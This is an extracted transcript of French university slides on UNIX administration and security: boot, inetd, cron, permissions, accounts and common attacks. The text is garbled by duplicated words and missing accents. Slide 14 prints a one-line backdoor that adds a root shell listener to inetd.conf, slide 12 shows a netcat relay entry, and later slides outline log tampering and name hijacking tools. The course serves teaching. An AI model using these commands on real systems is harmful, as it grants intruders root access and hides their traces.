UNIX Administration Securite 12 2008 for Students
Transcript of UNIX Administration Securite 12 2008 for Students
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
1/30
(c) A.JEMAI- Scurit Unix-2008 1
UNIXUNIX
Administration etAdministration et
SScuritcuritAbderrazakAbderrazakJEMAIJEMAI
Email :Email :[email protected]@insat.rnu.tn
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
2/30
2(c) A.JEMAI- Scurit Unix-2008
PlanPlan
PrPrsentation Gsentation Gnnrale drale dUnixUnix
MMcanisme de dcanisme de dmarrage du systmarrage du systmeme Permissions sous UnixPermissions sous Unix
Services rServices rseaux sousseaux sous unixunix Attaques sousAttaques sous unixunix
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
3/30
3(c) A.JEMAI- Scurit Unix-2008
CaractCaractristique du Systristique du Systme Unixme Unix
InteractifInteractif
MultitchesMultitches MultiMulti--utilisateursutilisateurs
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
4/30
4(c) A.JEMAI- Scurit Unix-2008
Historique dHistorique dUNIXUNIXAT&T
1969 cration dUNIX
1976 version 6
AT&T Berkeley
System III
System V R4
4.1 bsd
4.2 bsd (SunOs)1983
AIXSolaris, HP-UX Linux
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
5/30
5(c) A.JEMAI- Scurit Unix-2008
Composantes principales dComposantes principales dUNIXUNIX
SystSystme de fichiersme de fichiers
NoyauNoyau ShellShell
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
6/30
6(c) A.JEMAI- Scurit Unix-2008
Le systLe systme de fichiersme de fichiers
varusrtmphomedev bin etc
grouppasswd man spool
lp mail
mnt
bin log
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
7/30
7(c) A.JEMAI- Scurit Unix-2008
Noyau et processusNoyau et processus
Matriel : disques,
mmoire, cartesinterfaces, etc.)
Noyau
Processus 1
Processus 2
Processus N
kshsh
csh
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
8/30
8(c) A.JEMAI- Scurit Unix-2008
LeLe shellshell UnUn shellshell ::
CCest un programme (/est un programme (/usrusr//binbin//kshksh, /, /usrusr//binbin//cshcsh,,//usrusr//binbin/sh)./sh). Lors de son exLors de son excution il devient un processus (visualiser aveccution il devient un processus (visualiser avec
la commandela commandepsps).). CCest aussi un langage de commandes.est aussi un langage de commandes.
Les variantes :Les variantes : KshKsh : Korn: Korn shellshell
CshCsh : C: C--shellshell Sh :Sh : BourneBourne ShellShell BashBash :: kshksh enrichi (utilisenrichi (utilis dans Linux)dans Linux)
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
9/30
9(c) A.JEMAI- Scurit Unix-2008
Niveau dNiveau dexexcutioncution Description :Description :
0 : arrt de la machine0 : arrt de la machine1 : mono utilisateur1 : mono utilisateur2 : Multi2 : Multi--UtilisateursUtilisateurs3 : Multi3 : Multi--Utilisateurs avec NFSUtilisateurs avec NFS
5 : X115 : X116 : reboot6 : reboot
LancementLancement## InitInit levellevel
Exemple :Exemple :## initinit 00 pour arrter la machinepour arrter la machine## initinit 66 pour redpour redmarrermarrer
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
10/30
10(c) A.JEMAI- Scurit Unix-2008
Services rServices rseauxseaux //etcetc/services : description des port et services/services : description des port et services
associassociss //etcetc/inetd.conf : consult/inetd.conf : consult parpar inetdinetd pourpour
savoir quel ports surveiller et quel processussavoir quel ports surveiller et quel processus
lancer.lancer. A chaque demande deA chaque demande de telnettelnet, un d, un dmonmontelnetdtelnetd est crest cr pour spour soccuper du client.occuper du client.
A chaque demande de ftp, un dA chaque demande de ftp, un dmonmon ftpdftpd estestcrcr..
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
11/30
11(c) A.JEMAI- Scurit Unix-2008
//etcetc/inetd.conf/inetd.conf
Nom du service : (exNom du service : (ex telnettelnet)) Type de socket : type deType de socket : type de connectionconnection ((streamstream,, dgramdgram,, rawraw, etc.)., etc.). Protocole :Protocole : tcptcp ouou udpudp Etat :Etat : nowaitnowait, cr, crer un processus pour chaque requte.er un processus pour chaque requte. PropriPropritaire : le service aura les permissions du propritaire : le service aura les permissions du propritaire.taire.
Programme : nom du programmeProgramme : nom du programme lancerlancer Arguments : Les arguments associArguments : Les arguments associs au lancement du programme.s au lancement du programme.
telnet stream tcp nowait root /usr/sbin/in.telnetdin.telnetd
# ftp stream tcp nowait root /usr/sbin/in.ftpd in.ftpd
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
12/30
12(c) A.JEMAI- Scurit Unix-2008
Attaques sur /Attaques sur /etcetc//inetd.confinetd.conf
Traffic RelayingTraffic Relaying
Configuration :Configuration :1111111111 streamstream tcptcp nowaitnowait nobodynobody//usrusr//sbinsbin//tcpdtcpd //usrusr//binbin//ncnc [[next_hopnext_hop] 54321] 54321
couter sur le port 11111 et rediriger vers le port 54321couter sur le port 11111 et rediriger vers le port 54321
Output-to-input
Relay A
Output-to-inputRelay B
Client netcat
Hacker
Ecouteur netcatvictime
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
13/30
13(c) A.JEMAI- Scurit Unix-2008
InitInit etet inetdinetd
Ecoutenten
permanence
init
httpd
sendmail
inetd ftpd
telnetd
tftpd
Lancement lademande par
inetd
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
14/30
14(c) A.JEMAI- Scurit Unix-2008
Attaques surAttaques sur inetdinetd ::
BackdoorBackdoor
//binbin/sh/sh cc "" echoecho 1234512345 streamstreamtcptcp nowaitnowaitrootroot //binbin/sh/sh shsh ii "" >> />> /etcetc//inetd.confinetd.conf;;
killallkillall HUPHUP inetdinetd
Rajouter unRajouter un couteur sur le port 12345 qui excouteur sur le port 12345 qui excutecutetoute commande retoute commande reue sur le port due sur le port dentrentre.e.
DemanderDemander inetdinetd de relire son fichier de configuration.de relire son fichier de configuration.
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
15/30
15(c) A.JEMAI- Scurit Unix-2008
CronCron UtilisUtilis pour lancerpour lancer une heure prune heure prcise un programmecise un programme
ou un script.ou un script. ExemplesExemples
Effectuer un scan des virus chaque soir entre minuit et 3h duEffectuer un scan des virus chaque soir entre minuit et 3h dumatin.matin.
Autoriser lAutoriser laccaccs aux jeux uniquement entre 12h et 14h.s aux jeux uniquement entre 12h et 14h.
Les travaux sont dans /Les travaux sont dans /usrusr/lib//lib/crontabcrontab et /et /etcetc//crontabcrontab Les agresseurs peuvent programmer des attaques.Les agresseurs peuvent programmer des attaques.
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
16/30
16(c) A.JEMAI- Scurit Unix-2008
Lancement manuel des processusLancement manuel des processus Chemin de recherche des programmes : PATHChemin de recherche des programmes : PATH
Commande dCommande daffichage:affichage:$$ echoecho $ PATH$ PATH Exemple :Exemple :
//usrusr/local//local/binbin:/:/binbin:/:/usrusr//binbin:/:/usrusr/X11R6//X11R6/binbin
Autres commandes :Autres commandes :whereiswhereis,,whichwhich Le rLe rpertoire courantpertoire courant .. PrPrcaution : ne jamais mettre lecaution : ne jamais mettre le .. en den dbut dubut du pathpath..
ExempleExemple viterviter.:/.:/usrusr/local//local/binbin:/:/binbin:/:/usrusr//binbin:/:/usrusr/X11R6//X11R6/binbin
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
17/30
17(c) A.JEMAI- Scurit Unix-2008
Interaction avec les processusInteraction avec les processus A chaque processus correspond unA chaque processus correspond un pidpid..
Exemple : (1Exemple : (1 initinit, 526, 526 inetdinetd)) Afficher lAfficher ltat des processus :tat des processus :psps
Afficher tous les processus :Afficher tous les processus :psps auxaux killkill etet killallkillall : envoyer un signal: envoyer un signal un processusun processus
Exemple :Exemple : ## killkill --HUP 512HUP 512
## killallkillall --HUPHUP inetdinetd
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
18/30
18(c) A.JEMAI- Scurit Unix-2008
Comptes et groupesComptes et groupes Chaque utilisateur dChaque utilisateur dtient un comptetient un compte //etcetc//passwdpasswd Un utilisateur appartientUn utilisateur appartient un groupeun groupe //etcetc/group/group Les mots de passe sont stockLes mots de passe sont stocks danss dans //etcetc//shadowshadow Changer le mot de passeChanger le mot de passe
$$passwdpasswd
OldOld passwdpasswd ::
NewNew passwdpasswd
RetypeRetype newnew passwdpasswd
##passwdpasswdbobbob
NewNew passwdpasswd
RetypeRetype newnew passwdpasswd
CrCration dation dun utilisateur :un utilisateur : useradduseradd,, admintooladmintool,, userconfuserconf CrCration dation dun groupe :un groupe : groupaddgroupadd,, admintooladmintool,, userconfuserconf
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
19/30
19(c) A.JEMAI- Scurit Unix-2008
//etcetc//passwdpasswd root:xroot:x:0:0::0:0:rootroot:/:/rootroot:/:/binbin//bashbash
bin:xbin:x:1:1::1:1:binbin:/:/binbin::daemon:x:2:2:daemon:/daemon:x:2:2:daemon:/sbinsbin::adm:xadm:x:3:4::3:4:admadm:/var/:/var/admadm::lp:xlp:x:4:7::4:7:lplp:/var/spool/:/var/spool/lpdlpd::sync:xsync:x:5:0::5:0:syncsync:/:/sbinsbin:/:/binbin//syncsynchalt:xhalt:x:7:0::7:0:halthalt:/:/sbinsbin:/:/sbinsbin//halthaltmail:x:8:12:mail:/var/spool/mail:mail:x:8:12:mail:/var/spool/mail:news:x:9:13:news:/var/spool/news:news:x:9:13:news:/var/spool/news:uucp:xuucp:x:10:14::10:14:uucpuucp:/var/spool/:/var/spool/uucpuucp::ftp:x:14:50:FTP User:/var/ftp:ftp:x:14:50:FTP User:/var/ftp:squid:xsquid:x:23:23::/var/spool/:23:23::/var/spool/squidsquid:/:/devdev//nullnulldhcpd:xdhcpd:x:19:19::19:19:DhcpdDhcpd User:/var/User:/var/dhcpddhcpd::named:xnamed:x:25:25::25:25:BindBind User:/var/User:/var/namednamed::rpm:xrpm:x:37:37:RPM User:/var/lib/:37:37:RPM User:/var/lib/rpmrpm:/:/binbin/false/falseapache:x:48:48:Apache User:/var/www:apache:x:48:48:Apache User:/var/www:rpc:xrpc:x:32:32::32:32:PortmapperPortmapper RPC user:/:/RPC user:/:/binbin/false/falsenobody:xnobody:x:99:99::99:99:NobodyNobody:/::/:jemai:x:501:500:jemai:x:501:500:AbderrazakAbderrazakJEMAI:/home/jemai:/JEMAI:/home/jemai:/binbin//bashbash
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
20/30
20(c) A.JEMAI- Scurit Unix-2008
//etcetc/group/group root:xroot:x:0::0:rootroot
bin:xbin:x:1::1:root,bin,daemonroot,bin,daemondaemon:xdaemon:x:2::2:root,bin,daemon,ldaproot,bin,daemon,ldapsys:xsys:x:3::3:root,bin,admroot,bin,admadm:xadm:x:4::4:root,adm,daemonroot,adm,daemontty:xtty:x:5::5:lp:xlp:x:7::7:daemon,lpdaemon,lpmail:x:12:mailmail:x:12:mailnews:x:13:newsnews:x:13:news
uucp:xuucp:x:14::14:uucpuucpdhcpd:xdhcpd:x:19::19:squid:xsquid:x:23::23:named:xnamed:x:25::25:rpc:xrpc:x:32::32:apache:x:48:apache:x:48:
ftp:x:50:ftp:x:50:nobody:xnobody:x:99::99:secunix:xsecunix:x:501::501:
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
21/30
21(c) A.JEMAI- Scurit Unix-2008
Permission sous UNIXPermission sous UNIX Trois possibilitTrois possibilits ds daccaccs appels appeles permissions ou priviles permissions ou privilges:ges:
rreadead lecturelecture Affichage du contenu dAffichage du contenu dun run rpertoire (pertoire (lsls)) Affichage du contenu dAffichage du contenu dun fichier (more, cat,un fichier (more, cat, headhead,, tailtail))
wwriterite criturecriture Copie dCopie dun fichier dans un run fichier dans un rpertoire (pertoire (cpcp)) Changement du contenu dChangement du contenu dun fichier (vi)un fichier (vi) CrCration ou suppression dation ou suppression dun fichier dans un run fichier dans un rpertoire (pertoire (touchtouch, vi,, vi, rmrm))
xx exexcutercuter AccAccderder un run rpertoire (cd etpertoire (cd et findfind)) ExExcution dcution dun programmeun programme
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
22/30
22(c) A.JEMAI- Scurit Unix-2008
Affichage des caractAffichage des caractristiquesristiques
lsls --ll
r - xxwr- r - x
type propritaire groupe autres
group otheruser
mode
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
23/30
23(c) A.JEMAI- Scurit Unix-2008
lslsll$$ lsls --ll
--rwrw--rr----rr---- 1 jemai1 jemai adminadmin 255255 ffvv 12 15:3812 15:38 myprog.cmyprog.c--rwrw--rr----rr---- 1 jemai1 jemai adminadmin 00 sep 20 2001sep 20 2001 touchfiletouchfile--rwxrrwxr----rr---- 1 jemai1 jemai adminadmin 489489 ffvv 13 15:3813 15:38 myprogmyprogdrwxdrwx--rr--xrxr--xx 1 jemai1 jemai adminadmin 865865 marmar 5 18:585 18:58 myrepmyrep--rwrw-------------- 1 jemai1 jemai adminadmin 6060 avravr 18 20:51 perso18 20:51 persolrwxrwxrwxlrwxrwxrwx 1 jemai1 jemai adminadmin 1111 ff v 13 15:23 v 13 15:23linkfilelinkfile --> ./> ./binbin//mytestmytestdrwxdrwx--rr--xrxr--xx 1 jemai1 jemai adminadmin 865865 marmar 5 18:585 18:58 myrepmyrep
$$ lsls ldld //usrusr
drwxrdrwxr--xrxr--xx 3838 rootroot syssys 10241024 ffvv 12 15:00 /12 15:00 /usrusr
$$ lsls l /datal /data
drwxrdrwxr--xrxr--xx 33 rootroot syssys 512512 ffvv 12 15:00 archive12 15:00 archive--rwrw--rr----rr---- 33 rootroot rootroot 78607860 ffvv 12 15:1012 15:10 logfilelogfile
Nom du fichierGroupeProp.Permissions Taille Date
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
24/30
24(c) A.JEMAI- Scurit Unix-2008
lslsl /l /etcetc --rwrw--rr----rr---- 11 rootroot rootroot 255255 ffvv 12 15:3812 15:38 crontabcrontab
--rwrw--rr----rr---- 11 rootroot rootroot 00 sep 20 2001 exportssep 20 2001 exports--rwrw--rr----rr---- 11 rootroot rootroot 489489 ffvv 13 15:3813 15:38 fstabfstab--rwrw--rr----rr---- 11 rootroot rootroot 865865 marmar 5 18:58 group5 18:58 group
--rwrw--rr----rr---- 11 rootroot rootroot 6060 avravr 18 20:51 hosts18 20:51 hostslrwxrwxrwxlrwxrwxrwx 11 rootroot rootroot 1111 ff v 13 15:23 v 13 15:23init.dinit.d --> rc.d/init.d/> rc.d/init.d/--rwrw--rr----rr---- 11 rootroot rootroot 17581758 marmar 5 18:595 18:59 inittabinittab--rwrw--rr----rr---- 11 rootroot rootroot 955955 sep 21 2001 krb5.confsep 21 2001 krb5.conf--rwrw--rr----rr---- 11 rootroot rootroot 19221922 marmar 5 18:585 18:58 passwdpasswdlrwxrwxrwxlrwxrwxrwx 11 rootroot rootroot 77 ff v 13 15:23 v 13 15:23rcrc --> rc.d/> rc.d/rcrc**
lrwxrwxrwxlrwxrwxrwx 11 rootroot rootroot 1010 ff v 13 15:23 rc0.d v 13 15:23 rc0.d--> rc.d/rc0.d/> rc.d/rc0.d/lrwxrwxrwxlrwxrwxrwx 11 rootroot rootroot 1010 ff v 13 15:23 rc1.d v 13 15:23 rc1.d--> rc.d/rc1.d/> rc.d/rc1.d/lrwxrwxrwxlrwxrwxrwx 11 rootroot rootroot 1010 ff v 13 15:23 rc2.d v 13 15:23 rc2.d--> rc.d/rc2.d/> rc.d/rc2.d/lrwxrwxrwxlrwxrwxrwx 11 rootroot rootroot 1010 ff v 13 15:23 rc3.d v 13 15:23 rc3.d--> rc.d/rc3.d/> rc.d/rc3.d/lrwxrwxrwxlrwxrwxrwx 11 rootroot rootroot 1010 ff v 13 15:23 rc5.d v 13 15:23 rc5.d--> rc.d/rc5.d/> rc.d/rc5.d/lrwxrwxrwxlrwxrwxrwx 11 rootroot rootroot 1010 ff v 13 15:23 rc6.d v 13 15:23 rc6.d--> rc.d/rc6.d/> rc.d/rc6.d/
drwxrdrwxr--xrxr--xx 1010 rootroot rootroot 40964096 ffvv 13 15:3813 15:38 rc.drc.d//--rwrw--rr----rr---- 11 rootroot rootroot 8383 mai 20 18:57mai 20 18:57 resolv.confresolv.conf--rwrw--rr----rr---- 11 rootroot rootroot 417942 sep 20 2001 services417942 sep 20 2001 services--rr---------------- 11 rootroot rootroot 13731373 marmar 5 18:585 18:58 shadowshadow--rwrw--rr----rr---- 11 rootroot rootroot 295295 sep 14 2001sep 14 2001 inetd.confinetd.conf
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
25/30
25(c) A.JEMAI- Scurit Unix-2008
Unix TrustUnix Trust Les machinesLes machines unixunix se donnent mutuellement desse donnent mutuellement des
confiances via :confiances via ://etcetc/hosts.equiv/hosts.equiv
..rhostsrhosts
Avantages : exAvantages : excution des rcution des r--commandes (commandes (rcprcp,, rshrshrloginrlogin, etc.)., etc.).
InconvInconvnients : si un intrus rnients : si un intrus russit lussit laccaccss la premila premirere
machine, il peut attaquer toute la chamachine, il peut attaquer toute la chane.ne.
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
26/30
26(c) A.JEMAI- Scurit Unix-2008
Attaques des fichiers logAttaques des fichiers log Cible des attaques :Cible des attaques :
Fichiers log : mode ASCII, ayant privilFichiers log : mode ASCII, ayant privilgege rootroot.. FichiersFichiers utmputmp,,wtmpwtmp etet lastloglastlogayant le privilayant le privilgege rootroot..
Modifier les fichiers log :Modifier les fichiers log :
1.1. Lire le fichier /Lire le fichier /etcetc//syslog.confsyslog.conf2.2. Utiliser la technique dUtiliser la technique dbordement de pilebordement de pile bufferbuffer overflowoverflow
pour se procurer du privilpour se procurer du privilge dege de rootroot
3.3. Supprimer les entrSupprimer les entres correspondanteses correspondantes llidentitidentit dedellintrus.intrus.
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
27/30
27(c) A.JEMAI- Scurit Unix-2008
AltAltration des fichiersration des fichiers
utmputmp,,wtmpwtmp etet lastloglastlog
Format : binaireFormat : binaire
PrivilPrivilge :ge : rootroot Outils de modification :Outils de modification :
ftp.technotronic.com/unix/logftp.technotronic.com/unix/log--tools/tools/ Exemples :Exemples :
removeremove : modification du derni: modification du dernire date de connexion,re date de connexion,
adresse etadresse et tat des utilisateurs danstat des utilisateurs dans lastloglastlog.. WtmpedWtmped,, marrymarry,, cloakcloak,, logweditlogwedit,, wzapwzap etet zapperzapper..
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
28/30
28(c) A.JEMAI- Scurit Unix-2008
Services RServices Rseaux sous Unixseaux sous Unix
AppelAppel aussi X11. Offre une interface graphique GUIaussi X11. Offre une interface graphique GUI distance.distance.XXWindowWindowNetwork File System. Partages de ressources entre machinesNetwork File System. Partages de ressources entre machinesNFSNFS
Domain Name Server. RDomain Name Server. Rsolution des noms de domaines en adresse IPsolution des noms de domaines en adresse IPDSNDSN
ExExcution des commandescution des commandes distance (distance (rcprcp,, rloginrlogin,, rshrsh).).RR--cmdscmds
SendmailSendmailMAILMAIL
serveur web, initialisserveur web, initialis parpar initinitHTTPDHTTPD
Trivial File Transfert Protocol. Transfert sans authentificationTrivial File Transfert Protocol. Transfert sans authentificationTFTPTFTP
File Transfert Protocol (File Transfert Protocol (inetdinetd,, ftpdftpd). Transmission du texte en clair). Transmission du texte en clairFTPFTP
session de loginsession de login distance (distance (inetdinetd,, telnetdtelnetd).Transmission en clair).Transmission en clairTelnetTelnet
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
29/30
29(c) A.JEMAI- Scurit Unix-2008
Collecte des informationsCollecte des informations
sniffingsniffing Collecte des donnCollecte des donnes au niveau Mach (L2) dans un res au niveau Mach (L2) dans un rseau local.seau local. Nom du programme :Nom du programme : sniffersniffer
Type de donnType de donnes collectes collectes :es : nom de login etnom de login et passwdpasswd suitesuite unun telnettelnet.. Requtes et rRequtes et rponsesponses dnsdns Messages emailMessages email PasswdPasswd suitesuite un ftpun ftp Fichiers partagFichiers partags pars par nfsnfs
Comment ?Comment ? Avoir un compte, ou accAvoir un compte, ou accder illder illgalement (buffergalement (buffer overflowoverflow)) Carte rCarte rseau en modeseau en mode permiscuouspermiscuous modemode
Outils :Outils : TcpdumpTcpdump, freeware pour UNIX, freeware pour UNIX www.tcpdump.orgwww.tcpdump.org WindumpWindump, freeware pour Windows, freeware pour Windowswww.netgroupwww.netgroup--serv.polito.it.orgserv.polito.it.org SnortSnort sniffer et dsniffer et dtecteur dtecteur dintrusion rintrusion rseauseauwww.snort.orgwww.snort.org EtherealEthereal, pour UNIX et NT, pour UNIX et NTwww.ethereal.comwww.ethereal.com SniffitSniffit, freeware pour Unix, freeware pour Unixwww.reptile.rug.ac.be/~coder/sniffit/sniffit.htmlwww.reptile.rug.ac.be/~coder/sniffit/sniffit.html DsniffDsniff, pour Unix,, pour Unix,www.monkey.org/~dugsong/dsniff/www.monkey.org/~dugsong/dsniff/
-
8/8/2019 UNIX Administration Securite 12 2008 for Students
30/30
30(c) A.JEMAI- Scurit Unix-2008
HijackingHijacking SniffingSniffing: l: lagresseur collecte les informationsagresseur collecte les informations IPIP spoofingspoofing: l: lagresseur se dagresseur se dguise commeguise comme tant une autre machine (adresse IP).tant une autre machine (adresse IP).
HijackingHijacking: combinaison des deux techniques. Il s: combinaison des deux techniques. Il sagit de voler la session de la victime.agit de voler la session de la victime.La victime pense souvent que la session est perdu suiteLa victime pense souvent que la session est perdu suite un problun problme rme rseau.seau. Comment ?Comment ?
LLagresseur attend que la victime se connecte (authentification)agresseur attend que la victime se connecte (authentification) LLagresseur collecte les informations de la conversation (IP, TCPagresseur collecte les informations de la conversation (IP, TCP sequencesequence numbernumber,, etcetc).). LLagresseur envois des commandes en se dagresseur envois des commandes en se dguisant pour la victime.guisant pour la victime.
Outils :Outils : HuntHunt www.cri.cz/kra/index.htmlwww.cri.cz/kra/index.html DsniffDsniff JuggernautJuggernautwww.packetstorm.security.comwww.packetstorm.security.com IPIPWatcherWatcher www.engarde.comwww.engarde.com
TTYWatcherTTYWatcher, freeware, freeware atat ftp.cerias.purdue.edu/pub/tools/unix/sysutils/ftp.cerias.purdue.edu/pub/tools/unix/sysutils/ TTYSnoopTTYSnoop freewarefreeware atatwww.packetstorm.security.comwww.packetstorm.security.com